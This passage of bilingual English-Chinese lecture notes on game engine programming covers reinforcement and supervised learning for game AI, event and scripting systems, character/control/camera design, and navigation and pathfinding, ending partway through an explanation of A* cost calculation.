    • Owned Resource

      拥有的资源

    • Upgrade

      升级

    • Etc.

    DRL example-Convolutional Neural Network (CNN)

    ​DRL 示例-卷积神经网络(CNN)

    webp

    ResNet was also introduced.

    DRL example-Transformer

    ​DRL 示例-Transformer

    • Introduce attention mechanisms

      引入注意力机制

    • Uncertain length vector

      不确定长度向量

    • Represents complex features, such as multiple agents, well

      很好地表示像多代理这样的复杂特征

    webp

    DRL example-Long-Short Term Memory (LSTM)

    ​DRL 示例 - 长短期记忆 (LSTM)

    Enable AI to remember or forget earlier data

    ​使 AI 能够记住或忘记早期数据

    webp

    DRL example-NN Architecture Selection

    ​DRL 示例-NN 架构选择

    NN Architecture selection for different type of feature

    ​不同类型特征的 NN 架构选择

    • Fixed length vector feature

      固定长度向量特征

      • Multi-Layer Perceptron

        多层感知机

    • Uncertain length vector feature

      不确定长度向量特征

      • Long-Short Term Memory

        长短期记忆

      • Transformer

    • Image feature

      图像特征

      • ResNet
    • Raycast

    • Mesh

    webp

    Training Strategy-Supervised learning

    ​训练策略-监督学习

    AlphaStar is trained via both supervised learning and reinforcement learning. It first learned a policy by supervised learning from human expert data

    ​AlphaStar 通过监督学习和强化学习进行训练。它首先通过监督学习从人类专家数据中学习策略

    z is a statistic summary of a strategy sampled from human data (for example, a build order)

    ​z 是从人类数据中采样的策略的统计摘要(例如,构建顺序)

    Minimize the distance (KL divergence) of agent policy and human decision distribution sampled from z

    ​最小化从 z 中采样的代理策略和人类决策分布的距离(KL 散度)

    webp

    Training Strategy-Reinforcement learning

    ​训练策略-强化学习

    Secondly, it took RL technique to improve the SL policy

    ​其次,采用强化学习技术改进 SL 策略

    TD(λ), V-trace, and UPGO are specific reinforcement learning methods to improve the actor network and critic network.

    ​TD(λ)、V-trace、UPGO 是改进参与者网络和评论家网络的具体强化学习方法。

    The KL divergence from the old SL policy is also considered

    ​还会考虑与旧 SL 策略的 KL 散度

    These tricks improved the policy and made it more human-like

    ​这些技巧改进了策略,使其更像人类

    webp

    Train the Agent-Self Play & Adversarial

    ​训练 Agent-自我游戏和对抗

    In AlphaStar three pools of agents attend training initialized from SL policy

    ​在 AlphaStar 中,三个 Agent 池参加从 SL 策略初始化的训练

    • Main agents [MA]

      主要 Agent [MA]

      • Goal: the most robust agent, which is the final output

        目标:最稳健的 Agent,也是最终输出

      • Self-play (35%)

        自我游戏 (35%)

      • Against past LE and ME agents (50%)

        对抗过去的 LE 和 ME Agent (50%)

      • Against past MA agents (15%)

        对抗过去的 MA Agent (15%)

    • League exploiters [LE]

      联盟利用者 [LE]

      • Goal: find weakness of past all agents (MA, LE, ME)

        目标:找到过去所有 Agent (MA、LE、ME) 的弱点

      • Against all past agents (MA, LE, ME)

        对抗所有过去的 Agent (MA、LE、ME)

    • Main exploiters [ME]

      主要利用者 [ME]

      • Goal: find weakness of current MA agent

        目标:找到当前 MA Agent 的弱点

      • Against current MA agent

        对抗当前的 MA Agent

    webp

    RL or SL?——SL analysis

    ​RL 还是 SL?——SL 分析

    Supervised Learning needs high quality data, and sometimes behaves well too

    ​监督学习需要高质量的数据,有时表现也很好

    • It behaves like human

      它表现得像人类

    • But may not outperform human expert data

      但可能不会胜过人类专家数据

    • Human data is unbalanced

      人类数据不平衡

    • Sometimes there is not enough data

      有时数据不足

    webp

    RL or SL?-RL analysis

    ​RL 还是 SL?-RL 分析

    Reinforcement Learning is usually considered as the optimal solution, however

    ​强化学习通常被认为是最佳解决方案,但是

    • Training an RL model is tough

      训练 RL 模型很困难

    • The model is hard to converge

      模型很难收敛

    • The game environment for training is also a huge development project

      训练的游戏环境也是一个巨大的开发项目

    • The data collection process could be slow

      数据收集过程可能很慢

    • And the behavior may be unnatural

      行为可能不自然

    webp

    RL or SL?——Dense reward

    ​RL 还是 SL?——密集奖励

    What makes a good problem for RL

    ​什么才是 RL 的好问题

    webp

    RL or SL?——Summary

    | Situation for SL(SL 的情况) | Situation for RL(强化学习的情况) |
    | --- | --- |
    | Easy to get data(轻松获取数据) | Needs to outperform the master level(需要超越大师水平) |
    | Needs to perform like human(需要像人类一样表现) | Enough budget(足够的预算) |
    |  | Data is unavailable(数据不可用) |
    |  | Dense reward(密集奖励) |

    Hybrid

    ​混合

    Machine Learning is powerful.

    ​机器学习很强大。

    But it also costs a lot. For example, DeepMind spent 250 million dollars to finish AlphaStar, and a replication would need 13 million dollars

    ​但成本也很高。例如,DeepMind 花费 2.5 亿美元完成 alpha star,而复制需要 1300 万美元

    We often need to make a tradeoff that places the DNN at the human-like points (a part of the whole combat).

    ​我们经常需要做出权衡,将 DNN 放在类人点上(整个战斗的一部分)。

    webp

    References

    HTN

    GOAP

    MCTS

    Machine Learning

    Machine Learning Game Applications


    第十五节:游戏引擎的 Gameplay 玩法系统基础

    Gameplay Complexity and Building Blocks

    ​游戏复杂性和构建模块

    Outline of Gameplay System

    ​游戏系统概述

    Gameplay complexity and Building Blocks

    ​游戏复杂性和构建模块

    • Overview

      概述

    • Event Mechanism

      事件机制

    • Script System

      脚本系统

    • Visual Script

      可视化脚本

    • Character, Control and Camera

      角色、控制和相机

    AI

    Challenges in GamePlay (1/3)

    ​游戏玩法的挑战

    Cooperation among multiple systems

    ​多系统协作

    webp

    Challenges in GamePlay (2/3)

    Diversity of game play in the same game

    ​单种游戏多种玩法

    webp

    Challenges in GamePlay (3/3)

    Rapid iteration

    ​快速迭代

    webp

    This game changed its gameplay during development.

    Epic acknowledged that within the Fortnite fundamentals, they could also do a battle royale mode, and rapidly developed their own version atop Fortnite in about two months.

    ​Epic 承认,在 Fortnite 的基本原理内,他们也可以做一款大逃杀模式,并在大约两个月内迅速在 Fortnite 的基础上开发了自己的版本。

    Event Mechanism

    ​事件机制

    Let Objects Talk

    ​让不同对象之间联系

    webp

    Event/Message Mechanism

    ​事件/消息机制

    • Abstract the world communication to messages

      将世界通信抽象为消息

    • Decoupling event sending and handling

      解耦事件发送和处理

    webp

    A message mechanism makes it easy for different objects to communicate with each other.

    Publish-subscribe Pattern

    ​发布-订阅模式

    • Publisher categorizes published messages (events) into classes

      发布者将发布的消息(事件)分类为不同的类别

    • Subscribers receive messages (events) of interest without knowing which publishers sent them

      订阅者接收感兴趣的消息(事件),但不知道是哪个发布者

    webp

    3 Key Components of Publish-subscribe Pattern

    ​发布-订阅模式的 3 个关键组件

    • Event Definition

      事件定义

    • Callback Registration

      回调注册

    • Event Dispatching

      事件分派

    Event Definition

    ​事件定义

    webp

    Define the event's type (an enum) and its arguments.

    Type and Arguments

    ​类型和参数

    webp

    Impossible to hardcode

    ​硬编码不可能

    • Editable

      可编辑性

    webp

    Callback Registration

    ​回调注册

    Callback (function)

    ​回调(函数)

    • Any reference to executable code that is passed as an argument to another piece of code

      对作为参数传递给另一段代码的可执行代码的任何引用

    Literally, a callback function is one passed as an argument into another function; after that function finishes executing, the passed-in function is invoked. This process is called a callback.

    webp

    Object Lifespan and Callback Safety

    ​对象生命周期和回调安全

    Time points of registration and execution differ

    注册执行的时间点不同

    webp

    webp

    If the object that owns the callback has already been destroyed when the callback executes, the program crashes.

    Object Strong Reference

    ​对象强引用

    webp

    Make sure to unregister the callback function before deleting objects, otherwise it will cause a memory leak!

    ​删除对象前请务必注销回调函数,否则会造成内存泄漏!

    Prevent the object from being de-allocated as long as the callback function is still registered

    ​只要回调函数仍然注册,就防止对象被取消分配

    Object Weak Reference

    ​对象弱引用

    webp

    The object can be de-allocated, and the dispatcher will check whether the callback function is still valid

    ​对象可以被取消分配,并且将检查回调函数是否有效
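    A minimal sketch of the weak-reference approach in C++, assuming `std::weak_ptr` holds the listener (all names here are illustrative, not an engine API):

    #include <memory>
    #include <vector>

    struct Listener {
        void onEvent(int damage) { /* react to the event */ }
    };

    class Dispatcher {
    public:
        // A weak reference: registration does not extend the listener's lifetime.
        void addListener(std::weak_ptr<Listener> l) { listeners_.push_back(std::move(l)); }

        void dispatch(int damage) {
            for (auto it = listeners_.begin(); it != listeners_.end();) {
                if (auto strong = it->lock()) {   // still alive: promote and invoke
                    strong->onEvent(damage);
                    ++it;
                } else {
                    it = listeners_.erase(it);    // destroyed: drop the stale entry
                }
            }
        }

    private:
        std::vector<std::weak_ptr<Listener>> listeners_;
    };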

    Event Dispatch

    ​事件分派

    • Send event to appropriate destination

      将事件发送到适当的目的地

    webp

    Event Dispatch: Immediate

    ​事件分派:立即

    webp

    The parent function returns only after the callback function completes; this can cause the following problems:

    ​回调函数之后父函数返回,这么做可能出现如下问题:

    • Deep well of callbacks

      回调的深井

    webp

    This can make the call stack very deep and consume a lot of memory.

    • Blocked by function

      被函数阻止

    If some function in the chain takes a long time, the frame rate suddenly drops.

    webp

    The bleeding effect should be loaded, but it costs plenty of time inside this function call

    ​应该加载出血效果,但在此函数调用中会花费大量时间

    • Difficult for parallelization

    ​难以并行化

    webp

    Event Queue

    ​事件队列

    Basic implementation

    ​基本实现

    • Store events in queue for handling at an arbitrary future time

      将事件存储在队列中,以便在未来的任意时间进行处理

    webp

    Event Serializing and Deserializing

    ​事件序列化和反序列化

    • To store various types of events

      存储各种类型的事件

    webp

    Event Queue

    ​事件队列

    Ring buffer

    ​环形缓冲区

    webp
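    A fixed-capacity ring buffer for queued events might look like the following sketch (the `Event` payload and the capacity are placeholders):

    #include <array>
    #include <cstddef>
    #include <optional>

    struct Event { int type; int arg; };  // placeholder payload

    template <std::size_t N>
    class EventRingBuffer {
    public:
        bool push(const Event& e) {                    // producer side
            std::size_t next = (head_ + 1) % N;
            if (next == tail_) return false;           // full: drop or grow
            buf_[head_] = e;
            head_ = next;
            return true;
        }
        std::optional<Event> pop() {                   // consumer side
            if (tail_ == head_) return std::nullopt;   // empty
            Event e = buf_[tail_];
            tail_ = (tail_ + 1) % N;
            return e;
        }
    private:
        std::array<Event, N> buf_{};
        std::size_t head_ = 0, tail_ = 0;              // write / read indices
    };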

    Batching

    ​批处理

    webp

    Problems of Event Queue (1/2)

    ​事件队列的问题

    • Timeline not determined by publisher

      处理事件的时间点不由发布者决定

    webp

    Problems of Event Queue (2/2)

    • One-frame delays

      一帧延迟

    webp

    Game Logic

    ​游戏逻辑

    Early Stage Game Logic Programming

    ​早期游戏逻辑编程

    Compiled language (mostly C/C++)

    ​编译语言(主要是 C/C++)

    • Compiled to machine code with high performance

      编译为高性能机器代码

    • Much easier to use than assembly language

      比汇编语言更易于使用

    webp

    Modifying any piece of game logic requires recompiling the whole game.

    Problem of Compiled Languages

    ​编译语言的问题

    Game requirements get complex as hardware evolves

    ​随着硬件的发展,游戏要求变得复杂

    • Need quick iterations of gameplay logic

      需要快速迭代游戏逻辑

    Issues with compiled language

    ​编译语言的问题

    • Need recompilation with even a little modification

      即使进行少量修改也需要重新编译

    • The program can easily crash due to incorrect code

      程序很容易因代码错误而崩溃

    Glue Designers and Programmers

    ​将设计师和程序员连接起来

    • Get rid of inefficient communication between designers and programmers

      摆脱设计师和程序员之间低效的沟通

    • Designers need direct control of gameplay logic

      设计师需要直接控制游戏逻辑

    • Artists need to quickly adjust assets at the runtime environment

      艺术家需要在运行时环境中快速调整资产

    webp

    Scripting Languages

    ​脚本语言

    • Support for rapid iteration

      支持快速迭代

    • Easy to learn and write

      易学易写

    • Support for hot update

      支持热更新

    • Stable, less crash by running in a sandbox

      沙盒运行稳定,崩溃少

    function tick(delta)
        if input_system.isKeyDown(Keycode.W) then
            self:moveForward(delta)
        elseif input_system.isKeyDown(Keycode.S) then
            self:moveBackward(delta)
        end

        if input_system.isKeyDown(Keycode.MouseLeft) then
            self:fire(delta)
        end
        ...
    end

    Lua Script Example

    How Script Languages Work

    ​脚本语言的工作原理

    Script is converted to bytecode by a compiler first, then run on a virtual machine

    ​脚本首先由编译器转换为字节码,然后在虚拟机上运行

    webp

    Object Management between Scripts and Engine (1/2)

    ​脚本和引擎之间的对象管理 (1/2)

    Object lifetime management in native engine code

    原生引擎代码中的对象生命周期管理

    • Need to provide an object lifetime management mechanism

      需要提供对象生命周期管理机制

    • Not safe when script uses native objects (may have been destructed)

      当脚本使用原生对象时不安全(可能已被破坏)

    webp

    Object Management between Scripts and Engine (2/2)

    ​脚本和引擎之间的对象管理 (2/2)

    Object lifetime management in script

    脚本中的对象生命周期管理

    • The lifetime of objects are auto managed by script GC

      对象的生命周期由脚本 GC 自动管理

    • The time when object is deallocated is uncontrolled (controlled by GC)

      对象被释放的时间不受控制(由 GC 控制)

    • Easy to get memory leaks if reference relations get complex in the script

      如果脚本中的引用关系变得复杂,则容易发生内存泄漏

    webp

    Architectures for Scripting System (1/2)

    ​脚本系统架构 (1/2)

    Native language dominates the game world

    ​原生语言主导游戏世界

    • Most gameplay logic is in native code

      大多数游戏逻辑都采用原生代码

    • Script extends the functionality of native engine code

      脚本扩展了原生引擎代码的功能

    • High performance with compiled language

      编译语言带来高性能

    webp

    Architectures for Scripting System (2/2)

    Script language dominates the game world

    ​脚本语言主导游戏世界

    • Most gameplay logic is in script

      大多数游戏逻辑都在脚本中

    • Native engine code provides necessary functionality to script

      原生引擎代码为脚本提供必要的功能

    • Quick development iteration with script language

      使用脚本语言快速进行开发迭代

    webp

    Advanced Script Features - Hot Update

    ​高级脚本功能 - 热更新

    Allow modifications of script while game is running

    允许在游戏运行时修改脚本

    • Quick iteration for some specific logic

      针对某些特定逻辑进行快速迭代

    • Enable to fix bugs in script while game is online

      允许在游戏在线时修复脚本中的错误

    A troublesome problem with hot update

    ​热更新的一个麻烦问题

    • All variables that reference old functions should be updated too

      所有引用旧函数的变量也应更新

    webp

    Issues with Script Language

    ​脚本语言的问题

    The performance is usually lower than compiled language

    ​性能通常低于编译型语言

    • Weakly typed languages are usually harder to optimize at compile time

      弱类型语言在编译时通常更难优化

    • Need a virtual machine to run the bytecode

      需要虚拟机来运行字节码

    • JIT is a solution for optimization

      JIT 是优化的解决方案

    ​Weakly typed languages are usually harder to refactor

    ​弱类型语言通常更难重构

    webp

    Make a Right Choice of Scripting Language

    ​正确选择脚本语言

    Things need to be considered

    ​需要考虑的事项

    • Language performance

      语言性能

    • Built-in features, e.g. object-oriented programming support

      内置功能,例如面向对象编程支持

    Select the proper architecture of scripting

    ​选择合适的脚本架构

    • Object lifetime management in native engine code or script

      本机引擎代码或脚本中的对象生命周期管理

    • Which one is dominant, native language or script

      本机语言或脚本哪个占主导地位

    Popular Scripting Languages (1/2)

    ​热门脚本语言 (1/2)

    Lua (used in World of Warcraft, Civilization V)

    ​Lua(用于《魔兽世界》、《文明 5》)

    • Robust and mature

      强大且成熟

    • Excellent runtime performance

      出色的运行时性能

    • Light-weighted and highly extensible

      轻量且高度可扩展

    Python (used in The Sims 4, EVE Online)

    ​Python(用于《模拟人生 4》、《星战前夜》)

    • Reflection support

      反射支持

    • Built-in object-oriented support

      内置面向对象支持

    • Extensive standard libraries and third-party modules

      广泛的标准库和第三方模块

    C# (to bytecode offline, used in Unity)

    ​C#(离线字节码,用于 Unity)

    • Low learning curve, easy to read and understand

      学习难度低,易于阅读和理解

    • Built-in object-oriented support

      内置面向对象支持

    • Great community with lots of active developers

      拥有大量活跃开发人员的优秀社区

    webp

    Visual Scripting

    ​可视化脚本

    Why We Need Visual Scripting

    ​为什么我们需要可视化脚本

    • Friendly to non-programmers, especially designers and artists

      对非程序员,尤其是设计师和艺术家来说很友好

    • Less error-prone with drag-drop operations instead of code writing

      使用拖放操作代替代码编写,更不容易出错

    webp

    Visual Script is a Program Language

    ​Visual Script 是一种程序语言

    Visual script is also a programming language, which usually needs

    ​Visual Script 也是一种编程语言,通常需要

    • Variable

      变量

    • Statement and Expression

      语句和表达式

    • Control Flow

      控制流

    • Function

      函数

    • Class (for object-oriented programming language)

      类(用于面向对象编程语言)

    webp

    Variable

    ​变量

    Preserve the data to be processed or output

    ​保存要处理或输出的数据

    • Type

      类型

      • Basic type, e.g. integer, floating

        基本类型,例如整数、浮点数

      • Complex type, e.g.structure

        复杂类型,例如结构体

    • Scope

      作用域

      • Local variable

        局部变量

      • Member variable

        成员变量

    webp

    Variable Visualization - Data Pin and Wire

    ​变量可视化 - 数据引脚和数据线

    Use data wires through data pins to pass variables (parameters)

    ​通过数据引脚使用数据线传递变量(参数)

    • Each data type uses a unique pin color

      每种数据类型都使用独特的引脚颜色

    webp

    Statement and Expression

    ​语句和表达式

    Control how to process data

    ​控制如何处理数据

    • Statement: expresses some action to be carried out

      语句:表达要执行的某些操作

      • Assignment Statement

        赋值语句

      • Function Statement

        函数语句

    • Expression: to be evaluated to determine its value

      表达式:要进行求值以确定其值

      • Function Expression

        函数表达式

      • Math Expression

        数学表达式

    webp

    Statement and Expression Visualization - Node

    ​语句和表达式可视化 - 节点

    Use nodes to represent statements and expressions

    ​使用节点表示语句表达式

    • Statement Node

      语句节点

    • Expression Node

      表达式节点

    webp

    Control Flow

    ​控制流

    Control the statement execution order

    ​控制语句的执行顺序

    • Sequence

      顺序

      • By default statements are executed one by one

        默认情况下,语句会逐个执行

    • Conditional

      条件

      • Next statement is decided by a condition

        下一个语句由条件决定

    • Loop

      循环

      • Statements are executed iteratively until the condition is not true

        语句会迭代执行,直到条件不成立

    webp

    Control Flow Visualization -Execution Pin and Wire

    ​控制流可视化 - 执行引脚和连线

    Use execution wires through execution pins to make statements sequence

    ​使用执行连线通过执行引脚来制作语句序列

    • Use control statement nodes to make different control flow

      使用控制语句节点来制作不同的控制流

    webp

    Function

    ​函数

    A logic module which take in data, process it and return result(s)

    ​接收数据、处理数据并返回结果的逻辑模块

    • Input Parameter

      输入参数

      • The data required input to be processed

        需要输入以进行处理的数据

    • Function Body

      函数主体

      • Control how to process data

        控制如何处理数据

    • Return value(s)

      返回值

      • The data to be returned

        要返回的数据

    webp

    Function Visualization -Function Graph

    ​函数可视化 - 函数图

    Use a graph with connected nodes to make a function

    ​使用带有连接节点的来制作函数

    webp

    Class

    ​类

    A prototype for a kind of objects

    ​一种对象的原型

    • Member Variable

      成员变量

      • The lifetime is managed by the object instance

        生命周期由对象实例管理

    • Member Function

      成员函数

      • Can access member variables directly

        可以直接访问成员变量

      • May be overridden by derived classes

        可能被派生类覆盖

    webp

    Class Visualization -Blueprint

    ​类可视化 - 蓝图

    Use blueprint to define a class that inherits from a native class

    ​使用蓝图定义从本机类继承的类

    • Event Callback Functions

      事件回调函数

    • Member Functions

      成员函数

    • Member Variables

      成员变量

    webp

    Make Graph User Friendly

    ​使图表更方便用户使用

    • Fuzzy finding

      模糊查找

    • Accurate suggestions by type

      按类型提供准确建议

    Visual Script Debugger

    ​可视化脚本调试器

    Debug is an important step among development

    ​调试是开发过程中的重要步骤

    Provide user-friendly debug tools for visual scripting

    ​为可视化脚本提供用户友好的调试工具

    webp

    Issues with Visual Scripting (1/2)

    ​可视化脚本问题 (1/2)

    Visual script is hard to merge for a team work

    ​可视化脚本很难在团队合作中合并

    • Usually a visual script is stored as a binary file

      通常,可视化脚本以二进制文件形式存储

    • Manually reordering the script graph is inefficient and error-prone even with a merge tool

      即使使用合并工具,手动重新排序脚本图也效率低下且容易出错

    webp

    Issues with Visual Scripting (2/2)

    The graph can get pretty messy with complex logic

    ​图表可能因逻辑复杂而变得相当混乱

    • Need uniform graph layout rules for a team work

      团队合作需要统一的图表布局规则

    webp

    Script and Graph are Twins

    ​脚本和图是双胞胎

    webp

    “3C” in Game Play

    What is 3C?

    3C: Character, Control & Camera

    ​3C:角色、控制和摄像头

    3C is the primary element that determines the gameplay experience

    ​3C 是决定游戏体验的主要元素

    webp

    Character

    ​角色

    In-game character, both player and npc.

    ​游戏中的角色,包括玩家和 NPC。

    Includes character movement, combat, health/mana, what skills and talents they have, etc.

    ​包括角色移动、战斗、生命值、他们拥有的技能和天赋等。

    One most basic element of a character is movement.

    ​角色最基本的元素之一是移动

    webp

    Character: Well-designed Movement

    ​角色:精心设计的动作

    Movement looks simple, but it’s hard to do well.

    ​动作看似简单,但做好却很难。

    In AAA games, every basic action state needs to be broken down into detailed states.

    ​在 AAA 游戏中,每个基本动作状态都需要分解为详细状态。

    webp

    Extended Character: More complex and varied states

    ​扩展角色:更加复杂多样的状态

    webp

    • Hanging

      悬挂

    • Skating

      滑冰

    • Diving

      跳水

    Extended Character: Cooperate with other systems

    ​扩展角色:与其他系统配合

    Game effects, sound, environment interaction.

    ​游戏特效、声音、环境互动。

    Extended Character: More realistic motion with Physics

    ​扩展角色:更逼真的物理运动

    • Airflow

      气流

    • Inertia tensor

      惯性张量

    • Torque

      扭矩

    webp

    Movement State Machine

    ​运动状态机

    webp

    Control

    ​控制

    Different input device

    ​不同的输入设备

    Different game play

    ​不同的游戏玩法

    webp

    A Good Example of Control

    From Input to Game Logic

    webp

    Control: Zoom in and out

    ​控制:放大和缩小

    Control: Aim Assist

    ​控制:瞄准辅助

    webp

    This improves the player experience. Without aim assist, the latency between receiving the input and spawning the projectile in game logic could make it impossible for the player to aim.

    Control: Feedback

    ​控制:反馈

    webp

    For example, making the gamepad vibrate at the right moments.

    Control: Context Awareness

    ​控制:情境感知

    Context-sensitive controls

    ​情境敏感控制

    • The same input button produces different effects in different game scenarios

      同一输入按钮在不同的游戏场景中产生不同的效果

    webp

    Control: Chord & Key Sequences

    ​控制:和弦和按键序列

    webp

    Chords

    ​和弦

    • when pressed at the same time, produce a unique behavior in the game

      同时按下时,在游戏中产生独特的行为

    Key Sequences

    ​按键序列

    • Gesture detection is generally implemented by keeping a brief history of the HID actions performed by the player (see the sketch below)

      手势检测通常通过保存玩家执行的 HID 操作的简要历史记录来实现
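    A sketch of key-sequence detection over such a brief input history (the buttons, the combo, and the one-second window are made-up values):

    #include <chrono>
    #include <deque>
    #include <utility>

    enum class Button { Down, Forward, Punch };

    // Detects the sequence Down -> Forward -> Punch entered within one second.
    class ComboDetector {
        using Clock = std::chrono::steady_clock;
        std::deque<std::pair<Button, Clock::time_point>> history_;
    public:
        bool onButton(Button b) {
            auto now = Clock::now();
            history_.push_back({b, now});
            // Keep only a brief history of HID actions, as described above.
            while (!history_.empty() && now - history_.front().second > std::chrono::seconds(1))
                history_.pop_front();
            auto n = history_.size();
            return n >= 3 &&
                   history_[n - 3].first == Button::Down &&
                   history_[n - 2].first == Button::Forward &&
                   history_[n - 1].first == Button::Punch;  // combo fired
        }
    };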

    Camera: Subjective Feelings

    ​相机:主观感受

    webp

    Camera Basic: POV & FOV

    ​摄像机基础:POV 和 FOV

    POV (point of view)

    ​POV(视点)

    • determines the position of the player to observe

      确定玩家观察的位置

    FOV (field of view)

    ​FOV(视野)

    • determines the size of the player’s viewing angle

      确定玩家视角的大小

    webp

    Camera Binding

    ​摄像机绑定

    Using POV and rotation to bind.

    ​使用 POV 和旋转进行绑定。

    webp

    Camera Control

    ​相机控制

    webp

    The camera's position relative to the character should not be completely fixed.

    Camera Track

    ​相机轨迹

    webp

    Camera Effects

    ​相机特效

    Provide the camera with more post-visual effects, such as filters and shake.

    ​为相机提供更多后期视觉效果,如滤镜和抖动。

    webp

    Many Cameras: Camera Manager

    ​多个摄像机:相机管理

    Camera: Subjective Feelings

    ​相机:主观感受

    Complex effects are often achieved by multiple base adjustments. To create a sense of speed as an example, we can do:

    ​复杂的效果往往需要通过多次基础调整来实现。以营造速度感为例,我们可以这样做:

    • Add lines in the speed direction

      在速度方向上添加线条

    • The character falls backwards

      角色向后倒下

    • Motion blur

      动态模糊

    • Zoom in FOV (to speed up changes in screen content)

      放大 FOV(以加快屏幕内容的变化)

    Loose feeling

    ​放松的感觉

    • Relax camera movement

      放松镜头运动

    webp

    Cinematic

    ​电影

    • filter, motion, sound, narrator, model, animation, camera movement, …

      滤镜、动作、声音、旁白、模型、动画、镜头运动……

    webp

    Camera

    ​相机

    For artists and designers to optimize the effect:

    ​供艺术家和设计师优化效果:

    • Inheritable classes

      可继承的类

    • Function that can be accessed by Blueprint

      蓝图可访问的函数

    • Adjustable parameters

      可调整的参数

    webp

    Everything is Gameplay.

    References

    Event Mechanism

    Script

    Visual Scripting

    Gameplay and 3C

    第十六节:游戏引擎 Gameplay 玩法系统:基础 AI

    Basic Artificial Intelligence

    ​基础人工智能

    Outline of Artificial intelligence Systems

    ​人工智能系统概述

    AI Basics

    ​人工智能基础

    • Navigation

      导航

    • Steering

      转向

    • Crowd Simulation

      人群模拟

    • Sensing

      感知

    • Classic Decision Making Algorithms

      经典决策算法

    Advanced AI

    ​高级人工智能

    • Planning and Goals

      规划和目标

    • Machine Learning

      机器学习

    Navigation

    ​导航

    Navigation in Games

    ​游戏中的导航

    Find paths from a location to another in an automatic manner

    ​自动查找从一个位置到另一个位置的路径

    webp

    Navigation takes three steps:

    webp

    • Map representation

      地图表示

    • Path finding

      路径查找

    • Path smoothing

      路径平滑

    Map Representations - Walkable Area

    ​地图表示 - 可行走区域

    • We need to tell AI agents where they can walk - the Walkable Area

      我们需要告诉人工智能代理他们可以走到哪里 - 可行走区域

    • Walkable area of players is determined by character motion capabilities

      玩家的可行走区域由角色运动能力决定

      • Physical Collision

        物理碰撞

      • Climbing slope/height

        爬坡/高度

      • Jumping distance

        跳跃距离

    • Simulating the movement of AI agents the same way as players costs too much

      模拟人工智能代理作为玩家的移动成本太高

    • AI agents are still expected to have the same walkable area as players

      人工智能代理仍然需要与玩家拥有相同的可行走区域

    Map Representations - Formats

    ​地图表示 - 格式

    • Waypoint Network

      航点网络

    • Grid

      网格

    • Navigation Mesh

      导航网格

    • Sparse Voxel Octree

      稀疏体素八叉树

    Waypoint Network

    ​航点网络

    • Network connecting critical points (waypoints) from the map

      连接地图上关键点(航点)的网络

    • Waypoint sources:

      航点来源:

      • Designed important locations (the red points in the figure below)

        设计重要位置

      • Corner points to cover the walkable area (the green points)

        角点覆盖可步行区域

      • Internal points to connect nearby waypoints, adding flexibility to navigation (the blue points)

        内部点连接附近的航点,为导航增添灵活性

    webp

    Warcraft, for example, used a waypoint network.

    Usage of waypoint network is similar to subway system

    ​航点网络的使用方式与地铁系统类似

    • Find the nearest points to get on and off the network

      查找最近的上下车点

    • Plan the path on the waypoint network

      规划航点网络上的路径

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实施

    • Fast path finding, even for large maps

      路径查找速度快,即使对于大型地图也是如此

    Cons:

    ​缺点:

    • Limited flexibility: must go to the nearest point in the network before navigation

      灵活性有限:导航前必须前往网络中的最近点

    • Waypoint selection requires manual intervention

      航点选择需要人工干预

    webp

    Grid

    ​网格

    • Intuitive discretization of map

      直观的地图离散化

    • Uniform subdivision into small regular grid shapes

      均匀细分为小的规则网格形状

    • Common grid shapes

      常见的网格形状

      • Square

        正方形

      • Triangle

        三角形

      • Hexagon

        六边形

    webp

    A hexagonal grid like Civilization V's is less straightforward to allocate and store in memory.

    Grid property could be modified in runtime to reflect dynamic environmental changes

    ​可以在运行时修改网格属性以反映动态环境变化

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Uniform data structure

      统一的数据结构

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Accuracy depends on grid resolution

      精度取决于网格分辨率

    • Dense grid lowers pathfinding performance

      密集的网格会降低寻路性能

    • High memory consumption

      内存消耗高

    • Hard to handle 3D map

      难以处理 3D 地图

    webp

    Grids have difficulty handling 3D maps.

    Navigation Mesh (NavMesh)

    ​导航网格 (NavMesh)

    • Solves the problem of representing overlapped walkable areas

      解决表示重叠可行走区域的问题

    • Approximates the walkable area of character controller based on physical collision and motion capabilities

      根据物理碰撞和运动能力估计角色控制器的可行走区域

    • Lowers network density to boost pathfinding performance

      降低网络密度以提高寻路性能

    webp

    NavMesh Example

    ​NavMesh 示例

    Neighboring 3D convex polygons to represent walkable areas

    ​相邻的 3D 凸多边形表示可行走区域

    webp

    Convex Polygon of NavMesh

    ​NavMesh 的凸多边形

    Why convex polygon?

    ​为什么是凸多边形?

    • Pathfinding generates a series of polygons (the Polygon Corridor) that the path needs to pass through

      寻路会生成一系列需要穿过的多边形(多边形走廊)

    • Convexity guarantees that the final path stays inside the polygons and that two adjacent polygons share exactly one common edge (the Portal)

      凸性保证最终路径仅限于多边形内,并且两个相邻多边形只有一个共同边(传送门)

    webp

    Pros and Cons of NavMesh

    ​NavMesh 的优缺点

    Pros:

    ​优点:

    • Support 3D walkable surface

      支持 3D 可行走表面

    • Accurate

      准确

    • Fast in pathfinding

      寻路速度快

    • Flexible for selection of start/destination

      可灵活选择起点/终点

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Complex generation algorithm

      生成算法复杂

    • Does not support 3D space

      不支持 3D 空间

    webp

    Sparse Voxel Octree

    ​稀疏体素八叉树

    • Represents “flyable” 3D space

      表示“可飞行”的 3D 空间

    • Similar to spatial partitioning

      类似于空间分区

    • Finest-level voxels represent complicated boundaries

      最精细级别的体素表示复杂边界

    • Coarser-level voxels represent uniform regions

      较粗糙级别的体素表示均匀区域

    webp

    Path Finding

    ​路径查找

    Distances in map representations can be abstracted as edge costs in graph

    ​地图表示中的距离可以抽象为图中的边成本

    webp

    webp

    Depth-First Search

    ​深度优先搜索

    Expand most recently added

    ​展开最近添加的

    Breadth-First Search

    ​广度优先搜索

    Expand least recently added

    ​展开最近最少添加的

    Dijkstra Algorithm

    for each vertex v:
        dist[v] = ∞
        prev[v] = none
    dist[source] = 0
    set all vertices to unexplored
    while destination not explored:
        v = least-valued unexplored vertex
        set v to explored
        for each edge (v, w):
            if dist[v] + len(v, w) < dist[w]:
                dist[w] = dist[v] + len(v, w)
                prev[w] = v

    It always finds the shortest distance between two points in the graph.

    A Star (A*)

    • Expand lowest cost in list

      扩展列表中成本最低的元素

    • Distance is known distance from source + heuristic

      距离是距源的已知距离 + 启发式

    • Greedy: stops when reaches the goal

      贪婪:达到目标时停止

    A* - Cost calculation

    Cost calculation: $f(n) = g(n) + h(n)$

    ​成本计算:$f(n) = g(n) + h(n)$

    • $g(n)$: the exact cost of the path from the start to node $n$

